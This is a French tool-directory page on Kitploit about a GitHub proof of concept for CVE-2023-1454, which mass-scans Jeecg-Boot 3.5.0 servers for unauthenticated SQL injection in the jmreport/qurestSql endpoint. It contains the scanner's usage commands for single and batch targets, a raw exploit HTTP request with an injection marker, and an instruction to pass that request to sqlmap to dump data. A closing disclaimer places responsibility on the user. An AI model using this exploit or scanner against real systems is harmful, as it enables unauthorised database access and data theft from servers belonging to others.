Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-1454 — jmreport/qurestSql poc de scan en masse d'injections SQL non autorisées | Kitploit
Outils/GitHubGitHub/cjybao/cve-2023-1454
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcjybao/cve-2023-1454

CVE-2023-1454

jmreport/qurestSql poc de scan en masse d'injections SQL non autorisées

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-1454

POC de scan en masse d'injection SQL non autorisée pour jmreport/qurestSql Jeecg-Boot est une plateforme de développement rapide basée sur Spring Boot et Jeecg-Boot-Plus. De multiples vulnérabilités d'injection SQL ont été découvertes dans la dernière version jeecg-boot 3.5.0.

Utilisation de l'outil

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Test d'une seule URL

python3 CVE-2023-1454-scan.py -f url.txt Détection par lots

Après la numérisation, un fichier vuln.txt contenant les URL vulnérables sera généré dans le répertoire courant.

POC :

EXP :

Enregistrez le paquet en tant que fichier txt et utilisez sqlmap pour obtenir les données.

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}

Avertissement

Toute conséquence ou perte directe ou indirecte résultant de la diffusion ou de l'utilisation des informations fournies dans ce document relèvent de la seule responsabilité de l'utilisateur. L'auteur n'assume aucune responsabilité à cet égard.

Télécharger l’outil